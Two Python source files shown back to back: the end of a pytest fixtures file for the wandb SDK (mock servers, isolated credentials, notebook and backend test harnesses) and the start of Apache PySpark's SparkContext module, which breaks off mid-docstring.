with runner.isolated_filesystem():
r = git.Repo.init(".")
mkdir_exists_ok("wandb")
# Because the forked process doesn't use my monkey patch above
with open("wandb/settings", "w") as f:
f.write("[default]\nproject: test")
open("README", "wb").close()
r.index.add(["README"])
r.index.commit("Initial commit")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_port(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com:8080/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_empty_pass(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def dummy_api_key():
return DUMMY_API_KEY
@pytest.fixture
def test_settings(test_dir, mocker, live_mock_server):
"""Settings object for tests"""
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
wandb.wandb_sdk.wandb_run.EXIT_TIMEOUT = 15
wandb.wandb_sdk.wandb_setup._WandbSetup.instance = None
wandb_dir = os.path.join(test_dir, "wandb")
mkdir_exists_ok(wandb_dir)
# root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
settings = wandb.Settings(
_start_datetime=datetime.datetime.now(),
_start_time=time.time(),
api_key=DUMMY_API_KEY,
base_url=live_mock_server.base_url,
console="off",
host="test",
project="test",
root_dir=test_dir,
run_id=wandb.util.generate_id(),
save_code=False,
)
yield settings
# Just in case someone forgets to join in tests. ...well, please don't!
if wandb.run is not None:
wandb.run.finish()
@pytest.fixture
def mocked_run(runner, test_settings):
"""A managed run object for tests with a mock backend"""
run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
run._set_backend(MagicMock())
yield run
@pytest.fixture
def runner(monkeypatch, mocker):
# monkeypatch.setattr('wandb.cli.api', InternalApi(
# default_settings={'project': 'test', 'git_tag': True}, load_settings=False))
monkeypatch.setattr(
wandb.util, "prompt_choices", lambda x, input_timeout=None, jupyter=False: x[0]
)
monkeypatch.setattr(
wandb.wandb_lib.apikey,
"prompt_choices",
lambda x, input_timeout=None, jupyter=False: x[0],
)
monkeypatch.setattr(click, "launch", lambda x: 1)
monkeypatch.setattr(webbrowser, "open_new_tab", lambda x: True)
mocker.patch("wandb.wandb_lib.apikey.isatty", lambda stream: True)
mocker.patch("wandb.wandb_lib.apikey.input", lambda x: 1)
mocker.patch("wandb.wandb_lib.apikey.getpass.getpass", lambda x: DUMMY_API_KEY)
return CliRunner()
@pytest.fixture(autouse=True)
def reset_setup():
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
@pytest.fixture(autouse=True)
def local_netrc(monkeypatch):
"""Never use our real credentials, put them in their own isolated dir"""
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
# Touch that netrc
open(".netrc", "wb").close()
def expand(path):
if "netrc" in path:
try:
ret = os.path.realpath("netrc")
except OSError:
ret = origexpand(path)
else:
ret = origexpand(path)
return ret
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture(autouse=True)
def local_settings(mocker):
"""Place global settings in an isolated dir"""
with CliRunner().isolated_filesystem():
cfg_path = os.path.join(os.getcwd(), ".config", "wandb", "settings")
mkdir_exists_ok(os.path.join(".config", "wandb"))
mocker.patch("wandb.old.settings.Settings._global_path", return_value=cfg_path)
yield
@pytest.fixture
def mock_server(mocker):
return utils.mock_server(mocker)
# We create one live_mock_server per pytest-xdist worker
@pytest.fixture
def live_mock_server(request, worker_id):
global servers
server = servers[worker_id]
name = urllib.parse.quote(request.node.name)
# We set the username so the mock backend can namespace state
os.environ["WANDB_USERNAME"] = name
os.environ["WANDB_BASE_URL"] = server.base_url
os.environ["WANDB_ERROR_REPORTING"] = "false"
os.environ["WANDB_API_KEY"] = DUMMY_API_KEY
# clear mock server ctx
server.reset_ctx()
yield server
del os.environ["WANDB_USERNAME"]
del os.environ["WANDB_BASE_URL"]
del os.environ["WANDB_ERROR_REPORTING"]
del os.environ["WANDB_API_KEY"]
@pytest.fixture
def notebook(live_mock_server, test_dir):
"""This launches a live server, configures a notebook to use it, and enables
devs to execute arbitrary cells. See tests/test_notebooks.py
"""
@contextmanager
def notebook_loader(nb_path, kernel_name="wandb_python", save_code=True, **kwargs):
with open(utils.notebook_path("setup.ipynb")) as f:
setupnb = nbformat.read(f, as_version=4)
setupcell = setupnb["cells"][0]
# Ensure the notebooks talks to our mock server
new_source = setupcell["source"].replace(
"__WANDB_BASE_URL__", live_mock_server.base_url,
)
if save_code:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", nb_path)
else:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", "")
setupcell["source"] = new_source
nb_path = utils.notebook_path(nb_path)
shutil.copy(nb_path, os.path.join(os.getcwd(), os.path.basename(nb_path)))
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
nb["cells"].insert(0, setupcell)
try:
client = utils.WandbNotebookClient(nb, kernel_name=kernel_name)
with client.setup_kernel(**kwargs):
# Run setup commands for mocks
client.execute_cells(-1, store_history=False)
yield client
finally:
with open(os.path.join(os.getcwd(), "notebook.log"), "w") as f:
f.write(client.all_output_text())
wandb.termlog("Find debug logs at: %s" % os.getcwd())
wandb.termlog(client.all_output_text())
notebook_loader.base_url = live_mock_server.base_url
return notebook_loader
@pytest.fixture
def mocked_module(monkeypatch):
"""This allows us to mock modules loaded via wandb.util.get_module"""
def mock_get_module(module):
orig_get_module = wandb.util.get_module
mocked_module = MagicMock()
def get_module(mod):
if mod == module:
return mocked_module
else:
return orig_get_module(mod)
monkeypatch.setattr(wandb.util, "get_module", get_module)
return mocked_module
return mock_get_module
@pytest.fixture
def mocked_ipython(mocker):
mocker.patch("wandb.sdk.lib.ipython._get_python_type", lambda: "jupyter")
mocker.patch("wandb.sdk.wandb_settings._get_python_type", lambda: "jupyter")
html_mock = mocker.MagicMock()
mocker.patch("wandb.sdk.lib.ipython.display_html", html_mock)
ipython = MagicMock()
ipython.html = html_mock
def run_cell(cell):
print("Running cell: ", cell)
exec(cell)
ipython.run_cell = run_cell
# TODO: this is really unfortunate, for reasons not clear to me, monkeypatch doesn't work
orig_get_ipython = wandb.jupyter.get_ipython
orig_display = wandb.jupyter.display
wandb.jupyter.get_ipython = lambda: ipython
wandb.jupyter.display = lambda obj: html_mock(obj._repr_html_())
yield ipython
wandb.jupyter.get_ipython = orig_get_ipython
wandb.jupyter.display = orig_display
def default_wandb_args():
"""This allows us to parameterize the wandb_init_run fixture
The most general arg is "env", you can call:
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"})
To set env vars and have them unset when the test completes.
"""
return {
"error": None,
"k8s": None,
"sagemaker": False,
"tensorboard": False,
"resume": False,
"env": {},
"wandb_init": {},
}
def mocks_from_args(mocker, args, mock_server):
if args["k8s"] is not None:
mock_server.ctx["k8s"] = args["k8s"]
args["env"].update(utils.mock_k8s(mocker))
if args["sagemaker"]:
args["env"].update(utils.mock_sagemaker(mocker))
@pytest.fixture
def wandb_init_run(request, runner, mocker, mock_server):
marker = request.node.get_closest_marker("wandb_args")
args = default_wandb_args()
if marker:
args.update(marker.kwargs)
try:
mocks_from_args(mocker, args, mock_server)
for k, v in args["env"].items():
os.environ[k] = v
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
run = wandb.init(
settings=dict(console="off", mode="offline", _except_exit=False),
**args["wandb_init"],
)
yield run
wandb.finish()
finally:
unset_globals()
for k, v in args["env"].items():
del os.environ[k]
@pytest.fixture
def wandb_init(request, runner, mocker, mock_server):
def init(*args, **kwargs):
try:
mocks_from_args(mocker, default_wandb_args(), mock_server)
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
return wandb.init(
settings=dict(console="off", mode="offline", _except_exit=False),
*args,
**kwargs,
)
finally:
unset_globals()
return init
@pytest.fixture()
def restore_version():
save_current_version = wandb.__version__
yield
wandb.__version__ = save_current_version
try:
del wandb.__hack_pypi_latest_version__
except AttributeError:
pass
@pytest.fixture()
def parse_ctx():
"""Fixture providing class to parse context data."""
def parse_ctx_fn(ctx, run_id=None):
return utils.ParseCTX(ctx, run_id=run_id)
yield parse_ctx_fn
@pytest.fixture()
def record_q():
return queue.Queue()
@pytest.fixture()
def fake_interface(record_q):
return InterfaceQueue(record_q=record_q)
@pytest.fixture
def fake_backend(fake_interface):
class FakeBackend:
def __init__(self):
self.interface = fake_interface
yield FakeBackend()
@pytest.fixture
def fake_run(fake_backend):
def run_fn():
s = wandb.Settings()
run = wandb_sdk.wandb_run.Run(settings=s)
run._set_backend(fake_backend)
return run
yield run_fn
@pytest.fixture
def records_util():
def records_fn(q):
ru = utils.RecordsUtil(q)
return ru
yield records_fn
@pytest.fixture
def user_test(fake_run, record_q, records_util):
class UserTest:
pass
ut = UserTest()
ut.get_run = fake_run
ut.get_records = lambda: records_util(record_q)
yield ut
# @pytest.hookimpl(tryfirst=True, hookwrapper=True)
# def pytest_runtest_makereport(item, call):
# outcome = yield
# rep = outcome.get_result()
# if rep.when == "call" and rep.failed:
# print("DEBUG PYTEST", rep, item, call, outcome)
@pytest.fixture
def log_debug(caplog):
caplog.set_level(logging.DEBUG)
yield
# for rec in caplog.records:
# print("LOGGER", rec.message, file=sys.stderr)
# ----------------------
# internal test fixtures
# ----------------------
@pytest.fixture()
def internal_result_q():
return queue.Queue()
@pytest.fixture()
def internal_sender_q():
return queue.Queue()
@pytest.fixture()
def internal_writer_q():
return queue.Queue()
@pytest.fixture()
def internal_process():
# FIXME: return mocked process (needs is_alive())
return MockProcess()
class MockProcess:
def __init__(self):
self._alive = True
def is_alive(self):
return self._alive
@pytest.fixture()
def _internal_sender(record_q, internal_result_q, internal_process):
return InterfaceQueue(
record_q=record_q, result_q=internal_result_q, process=internal_process,
)
@pytest.fixture()
def internal_sm(
runner,
internal_sender_q,
internal_result_q,
test_settings,
mock_server,
_internal_sender,
):
with runner.isolated_filesystem():
test_settings.update(
root_dir=os.getcwd(), source=wandb.sdk.wandb_settings.Source.INIT
)
sm = SendManager(
settings=test_settings,
record_q=internal_sender_q,
result_q=internal_result_q,
interface=_internal_sender,
)
yield sm
@pytest.fixture()
def stopped_event():
stopped = threading.Event()
yield stopped
@pytest.fixture()
def internal_hm(
runner,
record_q,
internal_result_q,
test_settings,
mock_server,
internal_sender_q,
internal_writer_q,
_internal_sender,
stopped_event,
):
with runner.isolated_filesystem():
test_settings.update(
root_dir=os.getcwd(), source=wandb.sdk.wandb_settings.Source.INIT
)
hm = HandleManager(
settings=test_settings,
record_q=record_q,
result_q=internal_result_q,
stopped=stopped_event,
sender_q=internal_sender_q,
writer_q=internal_writer_q,
interface=_internal_sender,
)
yield hm
@pytest.fixture()
def internal_get_record():
def _get_record(input_q, timeout=None):
try:
i = input_q.get(timeout=timeout)
except queue.Empty:
return None
return i
return _get_record
@pytest.fixture()
def start_send_thread(
internal_sender_q, internal_get_record, stopped_event, internal_process
):
def start_send(send_manager):
def target():
try:
while True:
payload = internal_get_record(
input_q=internal_sender_q, timeout=0.1
)
if payload:
send_manager.send(payload)
elif stopped_event.is_set():
break
except Exception as e:
stopped_event.set()
internal_process._alive = False
t = threading.Thread(target=target)
t.name = "testing-sender"
t.daemon = True
t.start()
return t
yield start_send
stopped_event.set()
@pytest.fixture()
def start_handle_thread(record_q, internal_get_record, stopped_event):
def start_handle(handle_manager):
def target():
while True:
payload = internal_get_record(input_q=record_q, timeout=0.1)
if payload:
handle_manager.handle(payload)
elif stopped_event.is_set():
break
t = threading.Thread(target=target)
t.name = "testing-handler"
t.daemon = True
t.start()
return t
yield start_handle
stopped_event.set()
@pytest.fixture()
def _start_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
log_debug,
):
def start_backend_func(initial_run=True, initial_start=False):
ht = start_handle_thread(internal_hm)
st = start_send_thread(internal_sm)
if initial_run:
run = _internal_sender.communicate_run(mocked_run)
if initial_start:
_internal_sender.communicate_run_start(run.run)
return (ht, st)
yield start_backend_func
@pytest.fixture()
def _stop_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
collect_responses,
):
def stop_backend_func(threads=None):
threads = threads or ()
done = False
_internal_sender.publish_exit(0)
for _ in range(30):
poll_exit_resp = _internal_sender.communicate_poll_exit()
if poll_exit_resp:
done = poll_exit_resp.done
if done:
collect_responses.local_info = poll_exit_resp.local_info
break
time.sleep(1)
_internal_sender.join()
for t in threads:
t.join()
assert done, "backend didnt shutdown"
yield stop_backend_func
@pytest.fixture()
def backend_interface(_start_backend, _stop_backend, _internal_sender):
@contextmanager
def backend_context(initial_run=True, initial_start=False):
threads = _start_backend(initial_run=initial_run, initial_start=initial_start)
try:
yield _internal_sender
finally:
_stop_backend(threads=threads)
return backend_context
@pytest.fixture
def publish_util(
mocked_run, mock_server, backend_interface, parse_ctx,
):
def fn(
metrics=None,
history=None,
artifacts=None,
files=None,
begin_cb=None,
end_cb=None,
initial_start=False,
):
metrics = metrics or []
history = history or []
artifacts = artifacts or []
files = files or []
with backend_interface(initial_start=initial_start) as interface:
if begin_cb:
begin_cb(interface)
for m in metrics:
interface._publish_metric(m)
for h in history:
interface.publish_history(**h)
for a in artifacts:
interface.publish_artifact(**a)
for f in files:
interface.publish_files(**f)
if end_cb:
end_cb(interface)
ctx_util = parse_ctx(mock_server.ctx, run_id=mocked_run.id)
return ctx_util
yield fn
@pytest.fixture
def tbwatcher_util(mocked_run, mock_server, internal_hm, backend_interface, parse_ctx):
def fn(write_function, logdir="./", save=True, root_dir="./"):
with backend_interface() as interface:
proto_run = pb.RunRecord()
mocked_run._make_proto_run(proto_run)
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(proto_run)
request = pb.Request()
request.run_start.CopyFrom(run_start)
record = pb.Record()
record.request.CopyFrom(request)
internal_hm.handle_request_run_start(record)
internal_hm._tb_watcher.add(logdir, save, root_dir)
# need to sleep to give time for the tb_watcher delay
time.sleep(15)
write_function()
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def inject_requests(mock_server):
"""Fixture for injecting responses and errors to mock_server."""
# TODO(jhr): make this compatible with live_mock_server
return utils.InjectRequests(ctx=mock_server.ctx)
class Responses:
pass
@pytest.fixture
def collect_responses():
responses = Responses()
yield responses
@pytest.fixture
def mock_tty(monkeypatch):
class WriteThread(threading.Thread):
def __init__(self, fname):
threading.Thread.__init__(self)
self._fname = fname
self._q = queue.Queue()
def run(self):
with open(self._fname, "w") as fp:
while True:
data = self._q.get()
if data == "_DONE_":
break
fp.write(data)
fp.flush()
def add(self, input_str):
self._q.put(input_str)
def stop(self):
self.add("_DONE_")
with tempfile.TemporaryDirectory() as tmpdir:
fds = dict()
def setup_fn(input_str):
fname = os.path.join(tmpdir, "file.txt")
if platform.system() != "Windows":
os.mkfifo(fname, 0o600)
writer = WriteThread(fname)
writer.start()
writer.add(input_str)
fds["writer"] = writer
monkeypatch.setattr("termios.tcflush", lambda x, y: None)
else:
# windows doesn't support named pipes, just write it
# TODO: emulate msvcrt to support input on windows
with open(fname, "w") as fp:
fp.write(input_str)
fds["stdin"] = open(fname, "r")
monkeypatch.setattr("sys.stdin", fds["stdin"])
sys.stdin.isatty = lambda: True
sys.stdout.isatty = lambda: True
yield setup_fn
writer = fds.get("writer")
if writer:
writer.stop()
writer.join()
stdin = fds.get("stdin")
if stdin:
stdin.close()
del sys.stdin.isatty
del sys.stdout.isatty
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represent the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
self._accumulatorServer = accumulators._start_update_server()
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
jrdd = self._serialize_to_jvm(c, numSlices, serializer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, parallelism, serializer):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a file and loaded through textFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
return readRDDFromFile(self._jsc, tempFile.name, parallelism)
finally:
# readRDDFromFile eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
